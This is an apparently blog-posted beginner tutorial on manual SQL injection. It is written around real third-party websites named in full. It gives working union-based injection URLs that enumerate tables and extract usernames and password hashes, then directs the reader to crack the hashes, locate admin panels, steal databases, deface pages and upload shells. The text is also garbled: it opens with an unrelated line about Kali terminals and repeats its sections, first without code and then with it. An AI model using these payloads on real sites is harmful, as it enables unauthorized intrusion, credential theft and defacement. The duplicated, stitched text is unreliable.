Today I'll show you guys how to change kali linux terminal header text.
Hello everyone, today I will be giving you a guide to SQL Injection using the basics of manual injection. I will provide pictures, examples, step by step parts, tools and much more. so let's get started.
Tools you can use:
Tutorial:
Okay so let's start by choosing a website, it must end with "ID=NUMBER". That is the SQLi vulnerability.
I will be choosing this site
- Google Dorks (For finding vulnerable websites)
- MD5 Decrypter (Decrypting passwords in tables)
- Hash Cracker (Backup decrypter)
- Admin Page Finder #1 (Find admin page to login to)
- Admin Page Finder #2 (Backup admin page finder)
- String to ASCII Chart (For the part where you need to enter the column in ASCII)
Tutorial:
Okay so let's start by choosing a website, it must end with "ID=NUMBER". That is the SQLi vulnerability.
I will be choosing this site
Code:
http://calidus.ro/en/news.php?id=2
Now to test if the website is actually vulnerable, you just need to add an apostrophe to the end of it, so it looks like this:
Code:
http://calidus.ro/en/news.php?id=2'
and you should get a MySQL Error which is a good thing.
Finding amount of Columns
Now you are going to want to find the amount of columns, and you can do this by removing the apostrophe at the end and adding this to the end of your link:
Enter any number from 1-15, if you get an error, keep lowering the
number until you don't and vice versa. Find the number that if you go
one higher than you will get an error. So I will put
and I get an error, so I will lower it by one and the page loads perfectly, that number is the amount of columns on the site.
Gathering vulnerable columns
Now we want to find which columns are vulnerable, so we will do this, take out all the stuff on the link that comes after id=2 and replace it with this code:
Now in my case it's 1,2,3,4 because i have four columns, you change
yours to how many columns you have and remember to add the "--" at the
end. Also change ID=2 to either "Id=-2" or "Id=null" and your link
should look like this:
but remember to change column amount to yours!
Press enter and you will get a number or two, these are the vulnerable columns, now the MySQL version MUST be above 5 for this to work.
Checking MySQL Version
Next we will find the MySQL version of the columns, so pick one of the numbers that showed up on the site and look for it in your URL bar, then replace it with this code:
So your link should look like this
(You can do whatever number you like, as long as it's vulnerable.)
The @@version code makes the website display it's MYSQL version
Retrieving Table Names
After that, we will find the table names and for this you need some codes:
The 0x0a breaks the line between each table for easier viewing.
So you are now supposed to choose a vulnerable column and replace it with 'group_concat(table_name,0x0a)' and then add the last two codes in at the end.
Your link should look something like this:
Look for the "Users" table, or something like that, that's what you need.
Getting Column names from Tables
Now we will retrieve the column names from the tables, we are looking from the account info from the "users" table but first we need the columns.
We will need to replace some code, so look for "group_concat(table_name,0x0a) and replace (table_name,0x0a) with (column_name,0x0a)
Look for 'information_schema.tables' and replace 'tables' with 'columns'.
Finally, delete all the text after 'information_schema.tables' and infront of it add
But wait, that won't work. This could be because one of the two reasons:
You are copying directly from my tutorial and the table on your website
is not called users, and two you need to use ASCII. So go to your
website and find the table that you think is the users table. It could
be "Admin_Login" or anything like that. Once you find it, use the String
to ASCII link provided in the Links section to convert your table name
to ASCII. It should come up like this "123 456 789". You must change it
to "(123,456,789) by adding commas where the spaces were and brackets on
both sides. So you need to put do the steps above but replace "ASCII
CODE" with your table name in ASCII. Mine would be something like this
"117,115,101,114,115".
Extracting Data from Columns
Great, now we have the columns in the 'users' table, we now need the account info so look for the important columns you need which can be "User ID" "ID" "User_Password" "Password" etc.
This means you must change the previous 'group_concat' to something like this
Then, delete everything after '+from' and replace with this code
So your link should look a little like this:
Decrypting Account Detail Hashes
Finally, you should get some weird strings maybe mixed with text, that means the passwords are encrypted, mostly using MD5. So we want to go to this website: http://www.md5decrypt.org/
Then you want to enter the strings one by one, if MD5 doesn't work, try the other options like 'MD4', 'SHA1', etc.
Finding Admin Login Page
You finally have the user and password for the website, now what? You will need to find a page for you to login for admin access. For this you will be using an Admin Panel Finder, I have provided multiple links for them at the top of this tutorial, but I'll post the best here: http://sc0rpion.ir/
There, you've found your admin page and the admin login details, now you can do stuff like steal their DB, upload your deface page, upload a shell, and a lot more.
String Based Injection
Now if that first guide did not work, there may be a quick fix on your problem. If nothing happens when you type "union+select+1,3,3,7--" or whatever number, there is a fix and it's called String Based Injection. Basically what you do it first: If the ID was null change it to -(number) and add an apostrophe back infront of it so -69' would be an example. Then at the end where it says "--" you must change that to "--+-". If the tables are still not showing up, your numbers are not going high enough or the site is not vulnerable.
Now you are going to want to find the amount of columns, and you can do this by removing the apostrophe at the end and adding this to the end of your link:
Code:
+order+by+(number)--
Code:
http://calidus.ro/en/news.php?id=2+order+by+5-- Gathering vulnerable columns
Now we want to find which columns are vulnerable, so we will do this, take out all the stuff on the link that comes after id=2 and replace it with this code:
Code:
+union+select+1,2,3,4--
Code:
http://calidus.ro/en/news.php?id=null+union+select+1,2,3,4-- Press enter and you will get a number or two, these are the vulnerable columns, now the MySQL version MUST be above 5 for this to work.
Checking MySQL Version
Next we will find the MySQL version of the columns, so pick one of the numbers that showed up on the site and look for it in your URL bar, then replace it with this code:
Code:
@@version
Code:
http://calidus.ro/en/news.php?id=null+union+select+1,2,3,@@version-- The @@version code makes the website display it's MYSQL version
Retrieving Table Names
After that, we will find the table names and for this you need some codes:
Code:
group_concat(table_name,0x0a)
Code:
from+information_schema.tables
Code:
+where+table_schema=database()--So you are now supposed to choose a vulnerable column and replace it with 'group_concat(table_name,0x0a)' and then add the last two codes in at the end.
Your link should look something like this:
Code:
http://calidus.ro/en/news.php?id=null+union+select+1,2,3,group_concat(table_name,0x0a)+from+informati
on_schema.tables+where+table_schema=database()-- Getting Column names from Tables
Now we will retrieve the column names from the tables, we are looking from the account info from the "users" table but first we need the columns.
We will need to replace some code, so look for "group_concat(table_name,0x0a) and replace (table_name,0x0a) with (column_name,0x0a)
Look for 'information_schema.tables' and replace 'tables' with 'columns'.
Finally, delete all the text after 'information_schema.tables' and infront of it add
Code:
where+table_name=char(ASCII CODE) Extracting Data from Columns
Great, now we have the columns in the 'users' table, we now need the account info so look for the important columns you need which can be "User ID" "ID" "User_Password" "Password" etc.
This means you must change the previous 'group_concat' to something like this
Code:
group_concat(user_ID,0x3a,username,0x3a,user_password,0x0a)
Code:
+users--
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0
a),3,4,5,6,7,8,9,10,11,12,13+from+users-- Decrypting Account Detail Hashes
Finally, you should get some weird strings maybe mixed with text, that means the passwords are encrypted, mostly using MD5. So we want to go to this website: http://www.md5decrypt.org/
Then you want to enter the strings one by one, if MD5 doesn't work, try the other options like 'MD4', 'SHA1', etc.
Finding Admin Login Page
You finally have the user and password for the website, now what? You will need to find a page for you to login for admin access. For this you will be using an Admin Panel Finder, I have provided multiple links for them at the top of this tutorial, but I'll post the best here: http://sc0rpion.ir/
There, you've found your admin page and the admin login details, now you can do stuff like steal their DB, upload your deface page, upload a shell, and a lot more.
String Based Injection
Now if that first guide did not work, there may be a quick fix on your problem. If nothing happens when you type "union+select+1,3,3,7--" or whatever number, there is a fix and it's called String Based Injection. Basically what you do it first: If the ID was null change it to -(number) and add an apostrophe back infront of it so -69' would be an example. Then at the end where it says "--" you must change that to "--+-". If the tables are still not showing up, your numbers are not going high enough or the site is not vulnerable.
Thank you everyone for reading my basic SQL Injection tutorial for beginners, I hope you enjoyed and more to come soon!
Comments
Post a Comment